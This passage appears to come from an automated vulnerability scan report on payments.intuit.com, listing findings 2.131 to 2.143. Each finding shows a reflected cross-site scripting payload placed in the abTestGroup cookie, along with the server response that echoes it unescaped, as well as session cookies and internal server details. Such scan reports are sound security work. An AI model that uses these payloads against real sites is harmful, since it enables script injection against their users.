The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262dd"><script>alert(1)</script>f39fea87c00 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:54:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=gEMO0Uj6PkBJ7DxotzGYwA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:31:09 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95680780A0805192AA117E3A2F56F6B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108446

...[SNIP]...
<input id="testGroup" value="T16262dd"><script>alert(1)</script>f39fea87c00" type="hidden" />
...[SNIP]...

2.131. http://payments.intuit.com/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 54b80<script>alert(1)</script>618aff7c52b was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=EB3K6xHPm8Z4gMMc+8FP8A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D957C7D80A0805192AA117E33B1438DB
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108431

...[SNIP]...
<br />
A/B Test Group: T1654b80<script>alert(1)</script>618aff7c52b<br />
...[SNIP]...

2.132. http://payments.intuit.com/apply-now/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bfc"><script>alert(1)</script>2691f2a62ad was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mj0unVAWHa0hO+XWAF87xQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E35820A0805192AA117E3A09F0E66
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128379

...[SNIP]...
<input id="testGroup" value="T16e3bfc"><script>alert(1)</script>2691f2a62ad" type="hidden" />
...[SNIP]...

2.133. http://payments.intuit.com/apply-now/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload b8e7d<script>alert(1)</script>1a9cb1ed9ff was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:17 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=bkNCK07OCYlhWgd9BRZ2Jg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:18 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FCE130A0805192AA117E35B0EC2E7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128365

...[SNIP]...
<br />
A/B Test Group: T16b8e7d<script>alert(1)</script>1a9cb1ed9ff<br />
...[SNIP]...

2.134. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50dd"><script>alert(1)</script>0da146df87f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N5kpkn1f65UWezK4PWrIhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AF8AF0A0805192AA117E3D0164F8A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161404

...[SNIP]...
<input id="testGroup" value="T16d50dd"><script>alert(1)</script>0da146df87f" type="hidden" />
...[SNIP]...

2.135. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 5bab0<script>alert(1)</script>ddd1b3cb4d0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=1powooXFBn-h-hwDYnv+xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CD1C50A0805192AA117E35710C64D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161391

...[SNIP]...
<br />
A/B Test Group: T165bab0<script>alert(1)</script>ddd1b3cb4d0<br />
...[SNIP]...

2.136. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985ed"><script>alert(1)</script>23bad0dfc93 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=D7wXCvj0JH7i3uKdbQ-emg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC6930A0805192AA117E366D30E15
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93343

...[SNIP]...
<input id="testGroup" value="T16985ed"><script>alert(1)</script>23bad0dfc93" type="hidden" />
...[SNIP]...

2.137. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload dbc30<script>alert(1)</script>a86e2fa9ef0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=oxD02Vt1dG7QQnxJWJEH5g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C08810A0805192AA117E374365C21
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93328

...[SNIP]...
<br />
A/B Test Group: T16dbc30<script>alert(1)</script>a86e2fa9ef0<br />
...[SNIP]...

2.138. http://payments.intuit.com/products/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 20d8b<script>alert(1)</script>07ae2d24ce9 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nQy7xY0qaIGSmjWmG8-mmg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AA5C10A0805192AA117E3A4E9C6F1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90419

...[SNIP]...
<br />
A/B Test Group: T1620d8b<script>alert(1)</script>07ae2d24ce9<br />
...[SNIP]...

2.139. http://payments.intuit.com/products/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880a1"><script>alert(1)</script>9e7870cf12f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mIzaMcgmXkKXC6HMobj9Sw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9598B0D0A0805192AA117E332415D03
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90433

...[SNIP]...
<input id="testGroup" value="T16880a1"><script>alert(1)</script>9e7870cf12f" type="hidden" />
...[SNIP]...

2.140. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4c4"><script>alert(1)</script>961eb3d32b2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=q5EsYaR2RRf6wEGsGNei3A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95A83170A0805192AA117E3BA132B36
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92671

...[SNIP]...
<input id="testGroup" value="T161e4c4"><script>alert(1)</script>961eb3d32b2" type="hidden" />
...[SNIP]...

2.141. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload f2d55<script>alert(1)</script>c704fa6a9ea was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rEDN5E1j6+Ozz1G2T5PZlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C09510A0805192AA117E3D6AC554C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658

...[SNIP]...
<br />
A/B Test Group: T16f2d55<script>alert(1)</script>c704fa6a9ea<br />
...[SNIP]...

2.142. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d080e<script>alert(1)</script>76d20f74ae3 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:07 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-gNeCUsgqZfnpruGmn+O1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:08 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DCFDA0A0805192AA117E330CD5480
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101826

...[SNIP]...
<br />
A/B Test Group: T16d080e<script>alert(1)</script>76d20f74ae3<br />
...[SNIP]...

2.143. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8df"><script>alert(1)</script>8a97599db5e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CmnUcCtMpotVORb26tb9nw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C100A0A0805192AA117E3F608AB1B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
